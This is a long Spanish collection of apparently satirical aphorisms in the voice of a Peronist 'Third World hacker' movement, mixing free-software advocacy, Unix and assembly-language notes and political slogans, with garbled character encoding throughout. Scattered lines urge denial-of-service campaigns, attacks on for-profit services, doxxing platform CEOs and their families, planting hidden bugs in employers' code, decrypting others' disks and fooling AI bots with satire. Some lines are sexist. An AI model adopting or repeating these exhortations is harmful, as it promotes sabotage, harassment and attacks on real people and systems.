Vertebrado por una potente columna de hackers que luchan en las redes de datos, nuestro Tercer Mundo incidir� de manera concertada y decisiva en el �mbito de la gobernanza global de Internet.
Han sido los Hackers del Tercer Mundo quienes han garantizado los derechos individuales y colectivos, promoviendo para el empleo de las tecnolog�as digitales �rganos populares, democr�ticos, abiertos y descentralizados.
Todos han de permanecer vigilantes para evitar control social de nuestro Pueblo a trav�s de infraestructuras de c�mputo ajenas.
La tecnolog�a, por s� sola, vale dinero. Pero para que realmente tenga valor, hemos de fomentar la distribuci�n equitativa de sus beneficios, en un �mbito de explotaci�n popular sin discriminaci�n.
Para triunfar, los hackers deben estar unidos. S�lo as� podr�n descolonizar sus sistemas y liberar a nuestros Pueblos.
Si un sistema operativo es privativo, el virus inform�tico que lo destruye se convierte en una actualizaci�n.
En el espacio de direccionamiento de un microprocesador 8080, la ROM est� mapeada primero. En el 8086, lo es la RAM. Pero en la mente del programador, lo primero ha de ser la Justicia.
El objetivo del router es que cualquier paquete llegue a buen puerto TCP.
Con Jitsi Meet podremos ofrecer clases virtuales, establecer enlaces cifrados con terceros, presentar el contenido de nuestra pantalla o aplicaciones en �l, "dar la palabra" autorizando el uso del micr�fono (o "cerrar " micr�fono o webcam).
Cualquiera puede hacer videoconferencia ahora mismo sin tener que desplegar infraestructura de servidor alguna; simplemente apuntando el navegador a una web servida por Jitsi que haya sido creada de antemano.
Hemos puesto manos a la obra en b�squeda de un reemplazo a Zoom, desarrollando el servidor libre de videoconferencias Jitsi, capaz de ofrecer una performance mucho mayor. �Lo hemos realizado y estamos dispuestos a desplegarlo masivamente!
Indudablemente el Capital iba a proponer un servicio privativo como Zoom. Si bien gratuito, no pod�a dejar de ser un oprobio para los Pueblos.
La mediocre implementaci�n de seguridad de Zoom, sumada a un c�digo fuente envenenado y no disponible provocaron que en pocas horas fuese v�ctima del hackeo masivo. La soluci�n libre existe: Jitsi.
En la era que vivimos requerimos comunicarnos por una telem�tica que incluya tambi�n multimedia. Esto implica imagen en movimiento, audio, pero tambi�n - como dicen ahora los ni�os - el chat. GNU Jami lo hace posible.
Nadie duda que la telem�tica multimedia potenciar� a la educaci�n. Ha de ser de acceso masivo, irrestricto, y toda vez que gratuito, a la vez que se hace cardinal su ejecuci�n sobre plataformas libres, dominadas y controladas por el docente.
Quien olvida a los hackers tambi�n olvida un poco el futuro del pa�s.
El herramental que nos ofrece el c�mputo y la telem�tica puede y debe contribuir a las tarea de hacer de los educandos mejores hombres, pues ellos ser�n los due�os del porvenir.
La formaci�n aislada del c�mputo no es pr�diga en resultados. Debe plantearse con un m�todo concienzudamente estudiado y aplicado por un mago Unix adoctrinador, y su sapiencia ha de ser comprendida por los hackers.
Moodle es una plataforma de software liberado bajo GPLv3 orientada a la de gesti�n ense�anza en l�nea. Permite crear sitios web privados en los cuales educadores y educandos puedan lograr sus objetivos de aprendizaje.
Moodle es una de las plataformas de software de aprendizaje a distancia de c�digo abierto m�s utilizadas en la educaci�n superior. Permite a los profesores crear cursos en l�nea, promover la interacci�n y la construcci�n conjunta de contenido de aprendizaje.
Moodle habilita la interacci�n, la conversaci�n y el trabajo de red.
Como toda instalaci�n de servicios computados, debemos poner en funcionamiento un hardware-m�quina, y tomar debida nota de los atributos de los software-m�quina (especialmente los nombres de usuario y las contrase�as que les corresponden).
Algunos dicen que en nuestros servidores formamos lo que ellos llaman "pila LAMP". Olvidan que a este servidor de GNU con Linux+web Apache+base de datos MySQL+PHP le agregamos una aguerrida doctrina para la Liberaci�n.
El Trabajo Organizado nos hace afectos a la programaci�n de herramientas Unix, as� como la Felicidad del Pueblo nos implica consagrarnos a la creaci�n de juegos. La Liberaci�n nos impone - en cambio - la compilaci�n de potentes instrumentos para el combate telem�tico.
A pesar de lo que muchos creen, el kernel es un instrumento meramente t�ctico, que evoluciona con la hora y que el usuario no digita. Este intervendr� en la shell, y a lo sumo traer� chizitos.
El verdadero hacker, mas que programar, adoctrina.
Antes que en el avi�n negro, al software lo trasladaba en un cuadrado negro: el diskette de 5 1/4".
Si contamos con una conexi�n a Internet, podremos utilizar el servicio NTP para sincronizar el reloj de nuestra m�quina con ciertos relojes at�micos en l�nea.
Nuestro Movimiento ha de poner en efecto la Seguridad Telem�tica Reforzada. No implica esto enfrentar los desprotegidos a la acci�n represiva del Estado, sino implementar pol�ticas de salvaguarda que privilegien a los humildes en contra de la opresi�n omn�moda de los Oligarcas de los Datos.
Cuando sobran recursos, no se pone un cortafuegos: se abren puertos.
Cuando los recursos sobran, se comparten.
Todo Ataque de Denegaci�n de Servicios es consecuencia de la injusticia social.
A las compa�eras se les abren los puertos.
Con los puertos 22 y 23 abiertos damos al pueblo un abrazo de justicia y amor.
No ha de temerse al hardware, sino dominarlo con software propio, al que le decimos en la cara lo que queremos, en C.
En Window$ todas las aplicaciones son un caos. Eso es excelente.
El poder pol�tico brota de la GPL.
No den fish. Ense�en a compilar Fish.
No teman al hardware. Dom�nenlo.
El software privativo s�lo puede ser abolido a trav�s del software libre. Y para deshacerse de los Acuerdos de Usuario Final hemos de tomar la GPLv3 como bandera.
Cuando apuntas con finger para ver la luna, el cliente en lugar de ver la luna, solicita un finger.
Para despertar al tigre, usa un palo largo. Para dormir a un bruto, usa un video largo.
No se puede ser un hacker sin compilar al menos lo que se ejecuta.
El software Libre no es amor. El software libre es el mazo que utilizamos para aplastar a nuestros enemigos.
El software libre consiste en miles de verdades, pero todas se reducen a una frase: es justo compilar.
Eel software libre gira en torno a dejar que tu c�digo fuente salga al Tercer Mundo.
Dividan el todo en partes conectables por ca�os.
En Unix la unidad la dan los ca�os. En el Justicialismo, tambi�n.
El software privativo es un monstruo que hace devorar a los programadores entre s�, pero ser� progresivamente eliminado por quienes compilan software libre, y lo ser� en un futuro no muy distante.
El mal no existe en el hacking, sino en aquellas actividades desorganizadas e indisciplinadas que corresponden al uso del c�mputo por el Capital.
Una vez que el kernel bootea, milagros son posibles.
Los verdaderos hackers invierten m�s tiempo en la organizaci�n, instrucci�n, agitaci�n y propaganda que en compilar y depurar.
Los hackers son como los peces, y las redes de datos el agua en el que nadan.
La lucha telem�tica de los hackers es ofensiva por principio; mucho m�s que en la guerra convencional.
Finalmente derrotaremos al imperialismo telem�tico merced del efecto acumulativo de muchas campa�as de denegaci�n de servicio.
Muchos bandidos de la informaci�n posan como hackers, y es s�lo necesario corregir sus credos pol�ticos para convertirlos.
La insurrecci�n telem�tica y un cl�ster del pueblo libre no son s�lo naturales, sino inevitables.
Toda programaci�n genuina se origina de la compilaci�n in mente.
Esta lucha requiere una Masa de Hackers decididos y organizados, una CPU lo suficientemente fuerte, enlaces adecuados para el asalto telem�tico, y los recursos de almacenamiento suficiente para sostener operaciones indefinidas.
La acumulaci�n de Pings aumenta el Lag. Multiplicarlos por diez, cien, o cien mil millones logra la victoria.
El tendido es un camino, el enlace es un derrotero.
Es s�lo motivo del estado desorganizado de los hackers que las GAFAM osan desafiarlos.
A aquellos programadores que han escrito para empresas, salvo los elementos incorregibles, los hackers no deben dejarlos de lado, sino al contrario, deben persuadirlos para que se viertan a la lucha y oculten bugs indepurables en el c�digo de quien les paga.
Es mas f�cil cambiar el hardware de la masa que su software.
El �nico general que tiene Window$ es el General Failure.
A Window$ se lo arregla formateando.
Los protocolos son supremos.
Los protocolos de comunicaci�n son dif�ciles de monetizar. Utilizalos para combatir al Capital.
Combate las plataformas propietarias. Combate al Capital.
Implementar plataformas propietarias para mediar el discurso es criminal.
El poder y toma de decisiones debe mantenerse en el Pueblo y en el hacker que los conduzca.
La toma del poder por parte de un peque�o grupo de oligarcas que dominan empresas comerciales de plataformas ha convertido a las redes de datos en tecnoplantaciones. Esta nueva forma de esclavitud electr�nica debe ser erradicada de todos los enlaces.
Los verdaderos hackers cambian la gravitaci�n de su uso telem�tico de las plataformas a los protocolos.
Comunica tu m�dem con el de tus pares, no con una compa��a.
La Internet primigenia se asentaba en protocolos. La actual a�n lo hace: dis�ciate de las plataformas.
Usenet utiliza un protocolo abierto, el NNTP, al que cualquiera puede acceder utilizando variedad de aplicaciones.
R?ddit es s�lo una plataforma controlada enteramente por una �nica compa��a de capital. Dis�ciate.
La denegaci�n de servicios es una ofensiva de car�cter t�ctico y psicol�gico que los hackers emprenden pues su hardware no podr�a competir en calidad y menos a�n en cantidad con el de las ciber-oligarqu�as.
Si existe una �nica compa��a que ofrece un servicio inform�tico �nico para usuarios finales con fines de lucro, at�cala.
Si alquien construye un servicio inform�tico sobre una plataforma en las redes de datos y desea controlarlo para lucrar, at�calo y avisa al resto.
Muy raramente las plataformas protegen los datos de sus usuarias. En los pocos casos que lo hacen, se debe a mera incapacidad t�cnica.
Rara vez pueden moderarse contenidos sin sofrenar expresiones.
Si ha de moderarse una Plataforma, que sea en beneficio del Pueblo.
Una plataforma basada en empresa no puede moderarse ni auto moderarse. Pero en funci�n social puede expropiarse.
Mejor que expresar es hackear.
Para proteger la privac�a de usuaria final y su libertad de expresi�n, mas que una plataforma moderada, se hace imprescindible un tejido de protocolos telem�ticos libres.
Adem�s de asegurar la creaci�n de servicios inform�ticos cristalinos, los protocolos telem�ticos libres minimizan el impacto del comportamiento abusivo en l�nea.
No importa cuantas interfaces implementen los protocolos libres. Lo mejor est� en la diversidad.
Dis�ciate de plataformas privativas. Abraza las federadas.
Jam�s alimentes tecno-esclavos. Adoctr�nalos y hazlos perecer en una lucha a muerte por su propia Liberaci�n.
El comportamiento abusivo en l�nea puede ser destructivo.
Las plataformas en l�nea con fines de lucro subsisten sobre una relaci�n de poder injusta sobre usuarias cautivas.
Las plataformas en l�nea buscan cautivar usuarias.
Una usuaria cautiva es una tecno-esclava.
Nadie duda que las plataformas privativas basadas en empresas con fines de lucro constituyen el coto ideal para el acoso, la propalaci�n de discursos de odio, ciberamenazas, el spam, as� como la identificaci�n telem�tica maliciosa.
El doxxing o identificaci�n telem�tica maliciosa debe ser vectorizada �nicamente contra aquellos CEOs de las plataformas privativas basadas en empresas. Da cuenta de ellos y su heredad.
A una identificaci�n telem�tica maliciosa ha de responderse con una identificaci�n telem�tica mayor.
La identificaci�n telem�tica vectorizada contra los CEOs no es maliciosa, es Justicia.
Quien terceriza la moderaci�n de plataformas en trabajadores de subsistencia con sueldos m�nimos ha ser telem�ticamente identificado y telem�ticamente removido de las redes.
No existe soluci�n tecnol�gica alguna capaz de contextualizar adecuadamente o prever intenci�n.
No existe problema para identificar la intenci�n de las redes sociales basadas en empresas: siempre es mal�vola.
Una computadora es incapaz de reconocer s�tira o la hip�rbole, incluso a un nivel que ser�a obvio para cualquier lectora humana. Abusa esta funcionalidad contra bots de IA.
Las plataformas centralizadas no son la �nica fuente arbitral de lo que se permite y no se permite en las redes de datos. Utiliza plataformas fuertemente descentralizadas.
Un Conductor ha de saber utilizar las redes sociales basadas en empresa como un muelle, acumulando tensi�n de sus tecno-esclavos. Cuando lo necesite, la liberar�.
Conserva tus datos en discos propios, sobre los cuales te reservas control total y absoluto.
Encripta tus discos. Desencripta los ajenos.
Las usuarias deben ser capaces de hacer uso de sus propios datos encriptados en un servidor opaco de uso transparente.
La seguridad inform�tica no se hace por dinero.
La seguridad inform�tica se hace para asegurar informaci�n.
Un protocolo no ha de tener valor monetario alguno.
La representaci�n de valor no se hace con un protocolo.
Quien a un hash lo llama criptomoneda, le miente al fisco y le miente a su bolsillo.
Si el criptoactivo paga impuestos, vale. Si no lo hace, es aire.
La complejidad mata.
La simplicidad mata bugs.
El mejor depurador es la simplicidad.
El hacker es un programador que compila por reflejo lo que el Pueblo quiere.
Ciertas organizaciones de Capital - degeneradas por inter�s de control abusivo - hacen uso del c�digo fuente ya no como objeto de preparaci�n y estudio maquinal, sino como un instrumento para la dominaci�n.
Muchas veces se ha dicho que el software privativo va tras el lucro, pero el objetivo inconfeso es lograr la explotaci�n del hombre a trav�s de las m�quinas.
El tecno-oligarca puede volverse un tecno-esclavista con un solo clic.
Como trabajador organizado, jam�s debes gozar de menos Derechos de los que ostenta el sistema de c�mputo de un tecno-oligarca.
Hoy, las "venas abiertas" del Tercer Mundo son las "venas digitales" que cruzan los oc�anos, conectando un ecosistema t�cnico pose�do y controlado por un pu�ado de corporaciones.
Los cables transoce�nicos a menudo son provistos por infraestructura de fibra �ptica propiedad de corporaciones como Googl? y Fac?book, con el prop�sito de extracci�n de datos y monopolizaci�n de los medios de producci�n.
Los virus m�s complejos de MS-DOS estaban representados por cepas capaces de seguir el tren infeccioso sector de arranque ? int�rprete de comandos COMMAND.COM ? Polimorfismo en base a cifrado ? compresi�n variable.
Nuestros hackers dominan un conjunto de habilidades de programaci�n que les permiten escribir c�digo fuente de ejecuci�n sumamente veloz.
Nuestros hackers afianzaron la t�cnica para convertir ideas en c�digo fuente.
Nuestros hackers son capaces de analizar nuestros problemas de formas nuevas, y es esto lo que le permite encontrar soluciones de programaci�n novedosas.
Por a�os, los necios no han cesado de predecir la desaparici�n del lenguaje C, afirmando que el mundo est� listo para pasar a enfoques de programaci�n menos primitivos. No es casualidad que los mejores programas est�n escritos en C.
Es dif�cil trabajar con el lenguaje ensamblador, pero si lo utilizas correctamente, obrar�s programas con un rendimiento sin precedentes.
El lenguaje ensamblador por s� solo no hace un gur�. Simplemente hace un programa de veloc�sima ejecuci�n.
El lenguaje ensamblador unido a la sapiencia m�xima, permite utilizar hasta el �ltimo recurso de c�mputo para impulsar al m�ximo el rendimiento maquinal.
Solo el lenguaje ensamblador es el verdadero impulsor humano contra los l�mites inherentes del hardware.
El programador examina los requerimientos de una soluci�n, en alg�n nivel de abstracci�n dise�a una soluci�n, y luego hace que el dise�o cobre vida en una implementaci�n de c�digo fuente.
El programador de ensamblador debe realizar la transformaci�n de la especificaci�n de la aplicaci�n a c�digo m�quina enteramente por s� mismo.
El programador de ensamblador debe recurrir, ante todo, a la independecia. Y luego, a la auto-dependencia.
El programador de ensamblador debe - a diferencia de otros - tomar absoluta responsabilidad de su c�digo.
El programador de ensamblador debe ser capaz tanto de escribir cualquier rutina directamente, como controlar la m�quina al menor nivel pr�ctico: su sistema operativo, su BIOS, y su mismo hardware, en caso de ser necesario.
Los lenguajes de alto nivel como C y Pascal invariablemente introducir�n ineficientes transformaciones adicionales a una implementaci�n de dise�o en lenguaje ensamblador, sin importar cu�n buena esta sea.
Los lenguajes de alto nivel proveen un marco de trabajo para el programa completo, pero sus huecos deben completarse con funciones esot�ricas individuales escritas en lenguaje m�quina.
Contrarresta la ineficiencia de la transformaci�n del c�digo fuente al lenguaje m�quina con la facilidad de uso de un lenguaje de alto nivel.
La llamada de subrutinas en lenguaje m�quina no s�lo es �til para escribir rutinas propias en lenguaje m�quina, sino que permite controlar casi todas las funcionalidades del hardware (incluyendo entrada y salida directa a sus perif�ricos).
Nadie eval�a un hardware al l�mite con su primer programa "Hola Tercer Mundo!"; eso lleva tiempo y pr�ctica.
La buena programaci�n en ensamblador es un proceso altamente individualizado. Sus resultados realmente se potencian - sin embargo - al compartirlos en comunidad.
Los microprocesadores de la familia 808X se prestan muy bien al lenguaje ensamblador, mucho m�s que otras arquitecturas populares.
Gracias a la naturaleza rebuscada del procesador 8088, su lenguaje ensamblador difiere fundamentalmente de otros y su dominio suele ser mucho m�s complejo.
El 8088 es, con mucho, el m�s lento de los microprocesadores utilizados en las computadoras compatibles con IBM, por lo que no importa cu�n cuidadosamente se adapte el c�digo a las sutilezas del 8088, este funcionar� mucho m�s pistero en un 80286 o 80386.
Cuando apareci� la primer CPU 8086 a finales de los 70s, la tecnolog�a de semiconductores no estaba refinada como para poder integrarle instrucciones de coma flotante. Hubo de dispon�rsela en un coprocesador matem�tico opcional.
Para escribir programas ensambladores verdaderamente superiores, necesitas saber qu� hacen las diversas instrucciones y qu� instrucciones se ejecutan m�s r�pido. Para ello revisa el manual de tu microprocesador.
La programadora examina los requisitos de una aplicaci�n, dise�a una soluci�n seg�n alg�n nivel de abstracci�n y luego hace que ese dise�o cobre vida en una implementaci�n de c�digo fuente.
El software de aplicaci�n se orienta principalmente a tareas espec�ficas en contexto y funci�n.
El software de aplicaci�n significa, por sobre todas las cosas, la habilidad, de actuar/computar/entretener por s� mismo.
Los lenguajes de alto nivel proporcionan entornos artificiales que se prestan relativamente bien a las habilidades de programaci�n humana, para facilitar la transici�n del dise�o imaginado a la implementaci�n maquinal.
El lenguaje Ensamblador no es mas que una representaci�n humana del lenguaje de la m�quina.
El ensamblador proporciona un entorno de programaci�n dif�cil (el hardware b�sico y el software de sistemas de la computadora), pero los programas correctos no sufren p�rdidas de eficiencia por compilaci�n.
Al escribir en Ensamblador, la programadora debe realizar completamente por su cuenta la conversi�n de la especificaci�n de la aplicaci�n al lenguaje m�quina.
El ensamblador no es m�s que una herramienta que nos permite dise�ar programas en lenguaje m�quina sin tener que pensar en c�digos mnem�nicos en hexadecimal.
En el c�mputo, el conocimiento nunca es suficiente.
Todo conocimiento del c�mputo te permitir� escribir mejores programas.
El c�digo fuente ser� de todos o no servir� a nadie.
Mant�n al m�nimo tanto la cantidad de ciclos de computadora como las de bytes de memoria que necesita para correr.
Es posible lograr 2 o 3 �rdenes de magnitud en la mejora de desepe�o inform�tico de un programa utilizando lenguaje ensamblador, si est�d sispuesto a invertir en bytes adicionales para ahorrar ciclos de computadora.
Genera grupos de tecno-defensa dedicados a remover las ganancias econ�micas de la ecuaci�n tecno-esclavista.
Obra por defecto en la resistencia telem�tica pasiva.
El uso de encriptaci�n no puede clasificarse como radical.
El criptointercambio fraudulento es un ox�moron.
De existir una CPU que sirva s�lo para intermediar en el control olig�rquico del Pueblo, ha de overclocke�rsela hasta quemarla.
Nosotros lo que buscamos es la aut�ntica Liberaci�n del Pueblo, y esto puede ser facilitado por quien - como reflejo preclaro de su alma - es capaz de traducir este anhelo en c�digo fuente licenciado bajo GPL.
La GPL es un contrato que dura mucho a futuro. Es una promesa de uni�n.
La liberaci�n del hardware no implica un arduo trabajo intelectual de ingenier�a inversa, s�lo basta instalar en c�mputo propio, software propio.
De la misma manera en que la Conducci�n se nutre de las Din�micas de Masas, es que las din�micas de Cuantos afectan a los transistores.
El Mate, amargo. MATE, en castellano.
El chorip�n, de parado. El mail, cifrado.
El asado, con achuras. La netbook, con SSD.
La empanada, sin pasas. La netbook, sin Window$.
La cerveza, con pizza. El c�digo fuente, con comments.
El fernet, con coca. GNU, con ense�anza.
El cinzano, con picada. El disco, particionado.
El gol, sobre la hora. El server de juegos, sin contrase�a.
El Estado, sin Iglesia. El server, con puertos cerrados.
El sistema, Peronista.
En la Era de las redes sociales, �rais un producto. En la Era de la IA generativa, el dato de entrenamiento. Pero en la Era de la Justicia Social 2.0, hab�is actualizado vuestra alma con software bajo GPL para constituiros en un potente vector de Liberaci�n.
La constante de un oligarca es la variable de un peronista.
Si manipulas gran cantidad de datos, hazlo de una �nica forma: peronista.
Es mucho m�s simple escribir un programa incorrecto que entender el correcto.
Un lenguaje de programaci�n es de bajo nivel cuando sus rutinas requieren prestar atenci�n a lo irrelevante.
Es mejor disponer 100 �rdenes que operen sobre una estructura de datos que 10 funciones en 10 estructuras de datos. El conductor es uno solo, y la masa tambi�n.
Las estructuras de datos inteligentes y el c�digo burdo funcionan mucho mejor que en el caso inverso.
La ra�z del c�mputo es la recursi�n, donde se cambia descripci�n por tiempo. La ra�z de la organizaci�n es la doctrina, que evoca el mismo ahorro.
Para entender la recursi�n, uno primero debe entender la recursi�n.
Todo programa tiene al menos dos prop�sitos: aqu�l para el que fue escrito, y otro para el que no lo fu�.
Ocultar informaci�n implica la necesidad de vigilar las sendas de la comunicaci�n.
La optimizaci�n atrasa la evoluci�n.
Para comprender un programa, vu�lvete m�quina y vu�lvete programa.
Visualiza la informaci�n compleja en tu mente. La CPU, en todo caso, s�lo podr� simplificarla luego que t� mismo la has simplificado.
La simplicidad del c�mputo no precede su complejidad. Procede de ella.
Computacionalmente es dificultoso descubrir una unidad de tiempo correcta para medir el progreso. Cuantif�calo en la variable de la Felicidad del Pueblo.
A los hackers no se los mide por su ingenio y su l�gica, sino por su completitud anal�tica del caso de la felicidad computacional del Pueblo.
La cadena es una estructura de datos no parca, y en todo lado que se la incluye es dable una prol�gis que conlleve a la duplicaci�n de procesos. Es un veh�culo perfecto para ocultar informaci�n.
Los programas m�s geniales ya est�n guardados en tu RAM en este preciso instante. Tan s�lo transforma en 0 los 1s sobrantes, y ordena su ejecuci�n.
Existen dos maneras de escribir un programa libre de errores. Hacerlo privativo no es una de ellas.
Algunos lenguajes de programaci�n son capaces de absorber cambios, pero detienen el progreso.
Puedes medir la perspectiva de un programador notando su actitud frente a la vitalidad de C.
Lo �nico universal en las arquitecturas de c�mputo es el bucle Programa-Felicidad del pueblo.
El objetivo del c�mputo es la emulaci�n maquinal de la capacidad humana de hallar felicidad en comunidad.
Los sistemas cuentan con subsistemas, y los subsistemas tienen sub-subsistemas, ad infinitum.
El programador de LISP conoce el valor de todo, y el costo de nada.
El software se encuentra bajo tensi�n constante. Siendo simb�lico es arbitrariamente perfectible, pero tambi�n arbitrariamente modificable.
Es m�s f�cil cambiar la especificaci�n para que haga caso al programa que viceversa.
Los tontos ignoran la complejidad. Los pragmatistas la sufren. Algunos pueden evitarla. Los genios la eliminan.
En programaci�n, como en la vida, un error provoca un nacimiento.
Las constantes son ef�meras.
Cuando escribas un programa que aprenda, no lo har� y t� s�.
El coraz�n procesa s�mbolos, la CPU n�meros.
Cuantificamos nuestro entendimiento por el grado por el cual podemos aritmetizar una actividad. Quien pretenda proceder por grado de control ha de recibir un SIGKILL en la tabla de procesos.
El comando man es como un seguro: satisface porque casi nadie que la utilice depende de su beneficio.
Los lenguajes de programaci�n jam�s han abandonado su saco embrionario.
las usuarias deben parametrizar los procesos, no sus creadores.
Quien compila un sistema operativo privativo no es un creador. Simplemente un tecno-esclavista.
El intercambio cibern�tico entre la usuaria, la computadora y el software es como el juego de la silla: en la busqueda desesperada de equilibrio siempre deja a la que tiene culo en el piso.
Si su computadora habla el idioma de Braden, probablemente se deba a que est� hecha en China.
Un a�o invertido en el campo de la inteligencia artificial es suficiente para hacerle a uno creer en Dios.
La arquitectura RISC va a cambiar todo.
A pesar de que los chinos deber�an adorar a nVidia, es en RISC-V donde ponen sus chirolas.
Uno no aprende c�mputo por usar un smartphone, sino por dejar de usar un smartphone.
Sacarle el software privativo de Googl? a un tel�fono inteligente no es lobotomizarlo.
Si dudas en rootear tu smartphone, comienza por un celular muleto en muletas al que no temas brickear.
No lo llamo tel�fono inteligente, sino tel�fono atontador.
En caso de necesidad, reemplaza los ranchos de adobe con estructuras en base a smartphones brickeados.
La computadora es el contaminante perfecto. Sus feces son indestinguibles del alimento que produce.
Las interfaces mantienen el orden, pero no pueden acelerar el crecimiento. Las funciones s�.
Primero s� responsable por tu programa, luego escr�belo.
Las computadoras no organizan, simplemente exponen oportunidades para hacerlo.
En la simbiosis mujer-m�quina, la mujer debe ajustarse. Las m�quinas no pueden.
El tecno-oligarca llama �xito a resolver el problema equivocado.
No puede procederse de lo informal a lo formal por medios formales. Formatea.
La prueba de valor de un sistema es su mera existencia. Destr�yelo y comprueba su val�a.
Cuando dos programadores se encuentran para criticar sus programas, ambos guardan silencio.
La �nica teor�a que conecta la neurociencia y la psicolog�a surge del estudio de la Doctrina Justicialista t�cnicamente implantada como firmware en la mente colectiva de los Pueblos.
Podemos pensar que sabemos cuando aprendemos, y m�s cuando podemos escribirlo, incluso m�s cuando lo ense�amos, pero podemos estar s�lo ciertos cuando lo distribuimos como software.
Adaptar viejos programas para que funcionen en m�quinas nuevas a menudo implica adaptar las nuevas m�quinas para que se comporten como las viejas.
Cuando alguien diga "Quiero un lenguaje de programaci�n al cual s�lo necesite decirle lo que quiero hacer", denle un chupet�n.
Un buen sistema no puede tener un lenguaje de programaci�n d�bil.
Todo debe construirse de arriba a abajo. Excepto la primera vez.
Un programa que carezca de un bucle y una variable estructurada no debe escribirse.
Opera en forma concertada para destrozar la industria publicitarla y eliminarla de la cultura y la econom�a popular.
Si iba a decir "Hello World!", mejor que diga "Hola Mundo!"
Si iba a decir "Hola Mundo!", mejor que diga "�Hola Tercer Mundo!".
Mas que "Hello World!", que diga "�Viva Per�n!".
Puedes correr la versi�n ejecutable de los comandos por su nombre de identificaci�n en el disco, pero hasta que los comandos se ejecuten o esperan acceso a la CPU, no son procesos.
Un proceso es una orden en ejecuci�n.
Un proceso consta de seis partes: vias est�ndar de entrada, salida y error, el c�digo del programa que se ha ordenado ejecuci�n, junto con los ambientes globales y locales que le dan sustento.
No asocie ning�n retraso que ocurra con un error del sistema, porque los comandos tardan diferentes tiempos en ejecutarse, dependiendo de su complejidad de procesamiento.
La mayor�a de los procesos tienen la misma prioridad, es decir, el mismo derecho a usar la CPU, pero el sistema Unix cuenta con herramientas que permiten cambiar la prioridad de un proceso.
La prioridad de proceso de tiempo compartido es la clase normal de aplicaciones de usuaria.
La prioridad de proceso de tiempo real permite el uso del sistema Unix para aplicaciones que requieren tiempos de respuesta limitados y preestablecidos.
Los procesos en tiempo real siempre obtienen el uso del tiempo de la CPU con prioridad sobre aquellos procesos de tiempo compartido.
Aumentar la prioridad del proceso generalmente resulta en una ejecuci�n m�s r�pida del mismo, a expensas de otros procesos presentes en memoria, que atrasar�n su ejecuci�n conforme se eleven los tiempos en que aguardan la disponibilidad de la CPU.
Si bien el sistema Unix no establece un l�mite en la cantidad de procesos en segundo plano, el rendimiento del sistema tiende a degradarse ante el exceso de procesos.
Es posible concebir que adem�s de usted, los Pueblos est�n utilizando el sistema multiusuario desde diferentes terminales conectados a la m�quina.
Los usuarios de una m�quina constituyen un grupo de individuos que tienen intereses comunes, como por ejemplo la comunicaci�n, el intercambio de ficheros, y la Liberaci�n.
En Unix existe un delicado contraste entre la libertad de recorrer el sistema otorgada a las usuarias y las restricciones que se les dictan en consideraci�n a la seguridad.
El sistema Unix proporciona herramientas eficientes para definir el estado de seguridad de los identificadores de usuaria, ficheros y programas de uso com�n y ficheros privados.
Dado que Unix es un sistema multitarea, muchas cosas pueden suceder en memoria simult�neamente. Una mujer es similar.
Donde hay una necesidad, nace un software libre.
La mujer ha superado el per�odo de las tutor�as inform�ticas. La mujer debe afirmar su acci�n, la mujer debe compilar.
Ha llegado la hora de la mujer que comparte su c�digo y ha muerto la hora de la mujer como valor inerte y num�rico dentro de las redes sociales basadas en empresas de Capital.
Ha llegado la hora de la mujer que programa, depura, compila o ejecuta. Y ha muerto la hora de la mujer que asiste - atada e impotente - al caprichoso manejo remoto del destino de su sistema.
Yo no me dej� arrancar las coreutils que copi� de GNU, por eso no me deslumbr� jam�s la grandeza de las GAFAM y pude ver sus miserias. Por eso nunca me olvid� de las necesidades de mi Atom y pude ver sus grandezas.
Tengo dos distinciones: el amor de los hackers y el odio de los ciber-oligarcas.
No tenemos tiendas de aplicaciones, tenemos proveedur�as de aplicaciones. En ellas cada una toma lo que necesita.
Queremos un Pubnix pac�fico, potente, y soberana y una masa de programadores unida y feliz como ninguna.
Queremos el bienestar de los programadores, la dignificaci�n de los usuarios y la grandeza de este Pubnix que el Root nos ha dado y que todos debemos defender como el m�s justa, el m�s libre y la m�s soberano de las redes de datos.
Tenemos que convencernos para siempre: el software ser� de los pueblos si los pueblos decidimos enardecernos en el fuego sagrado del fanatismo.
Cada uno debe empezar a dar de s� todo el c�digo que pueda dar, y a�n m�s. Solo as� construiremos el Pubnix que deseamos, no para nosotros, sino para los que vendr�n despu�s, los programadores del ma�ana.
Lo �nico que debemos hacer es adquirir plena conciencia del c�digo que poseemos y no olvidarnos de que nadie puede distribuir sin acercarnos sus modificaciones, que nadie puede hacer tampoco nada que contrario a la GPLv3.
No alcanzar�n los bugs para colgar a los Window$.
�S�lo basta que los pueblos nos decidamos a ser due�os de nuestro propio c�digo fuente! Todo lo dem�s es cuesti�n de enfrentar al compilador.
Yo no quise ni quiero el c�digo para m�. Mi gloria es y ser� siempre el compilador GCC y el c�digo fuente de mi pueblo.
Y aunque deje en el disco volcados de n�cleo, yo s� que ustedes emparchar�n mis bugs y distribuir�n sus copias hasta la victoria.
El correo electr�nico funciona conceptualmente como el servicio de correo tradicional: permite la comunicaci�n entre usuarias, cada una de ellas identificada por una direcci�n, y cada mensaje tiene un paquete y un contenido.
El ejemplo m�s obvio de los nuevos medios de comunicaci�n digitales es el correo electr�nico, pero existen muchos otros, y habr� a�n m�s.
Los medios de comunicaci�n digitales son inherentemente capaces de ser m�s interactivos, participativos, igualitarios, descentralizados y menos jer�rquicos.
En Unix casi cualquier comando puede interrumpirse mientras espera los datos de entrada utilizando Ctrl+d.
En el entorno Unix, no es posible recuperar un archivo eliminado con el comando rm. Como precauci�n utiliza rm -i para solicitar confirmaci�n.
Los comandos Unix generalmente disponen de muchos argumentos opcionales, lo que ayuda a que el sistema sea extremadamente flexible y poderoso.
Los argumentos en los comandos del sistema Unix cumplen la misma funci�n que en M$-DO$ y otros sistemas operativos, es decir, modificar la ejecuci�n del comando.
El sistema Unix cuenta con un excelente sistema de archivos para almacenar ficheros, comandos y aplicaciones.
Dado que Unix es un sistema multiusuario, inmediatamente exige poder identificarte con absoluta certeza. De esta forma el sistema verifica tu intenci�n de acceder a los archivos privados y asigna a la sesi�n de trabajo la prioridad que te haya sido establecida.
Cada usuaria que se conecta al sistema Unix es referenciada por un identificador (Login ID). Para ser telem�ticamente pseudoan�nima, en lugar de proveer tu nombre o iniciales, invoca cualquier otra cosa.
Puesto que Unix puede servir a muchas usuarias diferentes, y cada una puede acceder a un conjunto de ficheros �nico, cuando el programa login te interrogue deber�s presentar un nombre v�lido de usuaria de sistema.
